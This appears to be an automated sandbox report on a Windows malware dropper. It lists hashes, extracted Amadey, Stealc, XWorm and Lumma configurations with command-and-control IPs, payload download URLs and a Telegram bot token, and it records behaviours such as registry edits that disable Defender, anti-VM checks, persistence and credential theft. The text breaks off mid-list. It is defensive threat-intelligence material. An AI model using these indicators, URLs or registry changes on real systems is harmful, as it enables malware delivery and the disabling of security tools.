Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-02-2025 12:30
Static task
static1
Behavioral task
behavioral1
Sample
54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe
Resource
win10v2004-20250217-en
General
-
Target
54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe
-
Size
2.0MB
-
MD5
354e5ac5449695bd3e8520e47ba4815e
-
SHA1
a023339baaea904f78d73c5b440ffa764aa9b6a2
-
SHA256
54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a
-
SHA512
ab31ab9d52efb5955003f62ec7d87dd706daf322d154a03bbe3533c385f9802777b1e939b9cfdbe9acd4431e7855907ae0d3c88a89ced8b20fb30a008550d42e
-
SSDEEP
49152:PyurhZIw1XiVWyvHdT8rXVZJDBw+fsPtoajy/v/FGiLi/0/dN:n0swdTiXBBRsPCRpLiE
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
amadey
5.21
a4d2cd
http://cobolrationumelawrtewarms.com
http://�������� jlgenfekjlfnvtgpegkwr.xyz
-
install_dir
a58456755d
-
install_file
Gxtuum.exe
-
strings_key
00fadbeacf092dfd58b48ef4ac68f826
-
url_paths
/3ofn3jf3e2ljk/index.php
Extracted
xworm
5.0
185.163.204.65:7000
SWaSxcOz2FkLWFU7
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042
Extracted
lumma
https://embarkiffe.shop/api
Signatures
-
Amadey family
-
Detect Poverty Stealer Payload 1 IoCs
resource yara_rule behavioral1/memory/2476-693-0x0000000000B70000-0x0000000000FB4000-memory.dmp family_povertystealer -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0005000000019efb-826.dat family_xworm behavioral1/memory/2488-832-0x0000000000370000-0x00000000003A0000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/2360-1115-0x00000000000C0000-0x000000000051E000-memory.dmp healer behavioral1/memory/2360-1116-0x00000000000C0000-0x000000000051E000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE -
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
-
Povertystealer family
-
Stealc family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 21 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2164843fd0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 62be2e4ee5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 025263805b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sha256.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8891a969d4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4d87c83574.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 779f2e3cef.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ftS1RPn.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Gxtuum.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e3ac3cdab5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp7E3NIXXMDNKTP108RHW4DBGOIWXT4VJY.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b711227598.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ uXivbut.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8QQOJj9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ad8ebfe024.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 206f21b5b7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c025a997b8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 139 2936 powershell.exe 163 3864 powershell.exe 201 2112 powershell.exe -
pid Process 3236 powershell.exe 3616 powershell.exe 3712 powershell.exe 2936 powershell.exe 3864 powershell.exe 2112 powershell.exe -
Downloads MZ/PE file 27 IoCs
flow pid Process 152 2972 BitLockerToGo.exe 36 2008 futors.exe 79 2008 futors.exe 139 2936 powershell.exe 163 3864 powershell.exe 96 2808 BitLockerToGo.exe 5 2816 skotes.exe 76 2008 futors.exe 201 2112 powershell.exe 6 2816 skotes.exe 6 2816 skotes.exe 6 2816 skotes.exe 6 2816 skotes.exe 6 2816 skotes.exe 6 2816 skotes.exe 6 2816 skotes.exe 6 2816 skotes.exe 6 2816 skotes.exe 6 2816 skotes.exe 6 2816 skotes.exe 6 2816 skotes.exe 6 2816 skotes.exe 6 2816 skotes.exe 94 3048 BitLockerToGo.exe 135 2816 skotes.exe 135 2816 skotes.exe 135 2816 skotes.exe -
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3420 chrome.exe 904 chrome.exe 920 chrome.exe 2196 chrome.exe -
Checks BIOS information in registry 2 TTPs 42 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4d87c83574.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2164843fd0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b711227598.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b711227598.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 025263805b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ad8ebfe024.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sha256.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 206f21b5b7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8891a969d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4d87c83574.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e3ac3cdab5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 62be2e4ee5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8891a969d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c025a997b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c025a997b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8QQOJj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sha256.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 779f2e3cef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp7E3NIXXMDNKTP108RHW4DBGOIWXT4VJY.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp7E3NIXXMDNKTP108RHW4DBGOIWXT4VJY.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 779f2e3cef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 62be2e4ee5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion uXivbut.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion uXivbut.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e3ac3cdab5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 025263805b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ad8ebfe024.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ftS1RPn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 206f21b5b7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2164843fd0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ftS1RPn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Gxtuum.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8QQOJj9.exe -
Executes dropped EXE 34 IoCs
pid Process 2816 skotes.exe 1248 amnew.exe 2008 futors.exe 1492 2164843fd0.exe 296 monthdragon.exe 2852 ed90bc6894.exe 1888 monthdragon.exe 2464 2fc4862a06.exe 1740 b711227598.exe 2220 53d97ceeb1.exe 2612 62be2e4ee5.exe 2844 025263805b.exe 1856 ad8ebfe024.exe 2476 ftS1RPn.exe 2088 DF9PCFR.exe 2968 uXivbut.exe 1256 Gxtuum.exe 1748 8QQOJj9.exe 2016 5aeda337ba.exe 1104 sha256.exe 2488 7tzlyz8.exe 1736 206f21b5b7.exe 1512 8891a969d4.exe 776 c025a997b8.exe 1860 c8eeb9dd28.exe 2360 TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE 2496 DF9PCFR.exe 3172 4d87c83574.exe 3764 483d2fa8a0d53818306efeb32d3.exe 2412 e3ac3cdab5.exe 1448 779f2e3cef.exe 3480 962135d7e8.exe 3040 d4f1f629e6.exe 4032 Temp7E3NIXXMDNKTP108RHW4DBGOIWXT4VJY.EXE -
Identifies Wine through registry keys 2 TTPs 21 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 8QQOJj9.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine ftS1RPn.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 779f2e3cef.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine Temp7E3NIXXMDNKTP108RHW4DBGOIWXT4VJY.EXE Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine sha256.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 8891a969d4.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 2164843fd0.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 4d87c83574.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine e3ac3cdab5.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 025263805b.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine uXivbut.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine c025a997b8.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 206f21b5b7.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine b711227598.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 62be2e4ee5.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine ad8ebfe024.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine Gxtuum.exe -
Loads dropped DLL 64 IoCs
pid Process 2372 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe 2372 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe 2816 skotes.exe 1248 amnew.exe 2816 skotes.exe 2816 skotes.exe 2008 futors.exe 2008 futors.exe 2816 skotes.exe 296 monthdragon.exe 2848 WerFault.exe 2848 WerFault.exe 2848 WerFault.exe 2816 skotes.exe 2816 skotes.exe 2816 skotes.exe 2816 skotes.exe 2816 skotes.exe 2220 53d97ceeb1.exe 2220 53d97ceeb1.exe 2220 53d97ceeb1.exe 2008 futors.exe 2008 futors.exe 2816 skotes.exe 2008 futors.exe 2816 skotes.exe 2816 skotes.exe 2816 skotes.exe 2816 skotes.exe 2816 skotes.exe 2968 uXivbut.exe 2968 uXivbut.exe 2088 DF9PCFR.exe 2816 skotes.exe 2816 skotes.exe 2816 skotes.exe 2016 5aeda337ba.exe 2016 5aeda337ba.exe 2016 5aeda337ba.exe 1256 Gxtuum.exe 1256 Gxtuum.exe 2816 skotes.exe 2816 skotes.exe 2816 skotes.exe 2816 skotes.exe 3048 BitLockerToGo.exe 2816 skotes.exe 2808 BitLockerToGo.exe 2816 skotes.exe 2936 powershell.exe 2936 powershell.exe 2816 skotes.exe 2816 skotes.exe 3864 powershell.exe 3864 powershell.exe 2816 skotes.exe 2816 skotes.exe 2816 skotes.exe 2816 skotes.exe 2816 skotes.exe 2816 skotes.exe 2112 powershell.exe 2112 powershell.exe 2972 BitLockerToGo.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\779f2e3cef.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091566001\\779f2e3cef.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\962135d7e8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091567001\\962135d7e8.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\d4f1f629e6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091568001\\d4f1f629e6.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\62be2e4ee5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10011850101\\62be2e4ee5.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\ad8ebfe024.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10011860101\\ad8ebfe024.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\c8eeb9dd28.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091562101\\c8eeb9dd28.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091563021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\e3ac3cdab5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091565001\\e3ac3cdab5.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000700000001a4e6-995.dat autoit_exe behavioral1/files/0x000700000001c878-1485.dat autoit_exe behavioral1/files/0x000b00000001c882-1545.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
pid Process 2372 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe 2816 skotes.exe 1492 2164843fd0.exe 1740 b711227598.exe 2612 62be2e4ee5.exe 2844 025263805b.exe 1856 ad8ebfe024.exe 2476 ftS1RPn.exe 2968 uXivbut.exe 1256 Gxtuum.exe 1748 8QQOJj9.exe 1104 sha256.exe 1736 206f21b5b7.exe 1512 8891a969d4.exe 776 c025a997b8.exe 2360 TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE 3172 4d87c83574.exe 3764 483d2fa8a0d53818306efeb32d3.exe 2412 e3ac3cdab5.exe 1448 779f2e3cef.exe 4032 Temp7E3NIXXMDNKTP108RHW4DBGOIWXT4VJY.EXE -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 296 set thread context of 1888 296 monthdragon.exe 40 PID 2852 set thread context of 3024 2852 ed90bc6894.exe 48 PID 2844 set thread context of 3048 2844 025263805b.exe 53 PID 1856 set thread context of 2808 1856 ad8ebfe024.exe 54 PID 2088 set thread context of 2496 2088 DF9PCFR.exe 58 PID 2220 set thread context of 2192 2220 53d97ceeb1.exe 47 PID 1512 set thread context of 2972 1512 8891a969d4.exe 84 PID 2016 set thread context of 1852 2016 5aeda337ba.exe 64 PID 2220 set thread context of 1804 2220 53d97ceeb1.exe 66 PID 2016 set thread context of 3444 2016 5aeda337ba.exe 113 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\Gxtuum.job uXivbut.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2848 296 WerFault.exe 38 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 962135d7e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b711227598.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DF9PCFR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c025a997b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ad8ebfe024.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e3ac3cdab5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 962135d7e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 025263805b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2164843fd0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5aeda337ba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 206f21b5b7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ftS1RPn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d4f1f629e6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8QQOJj9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8891a969d4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 779f2e3cef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4d87c83574.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 962135d7e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DF9PCFR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2fc4862a06.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 62be2e4ee5.exe Key 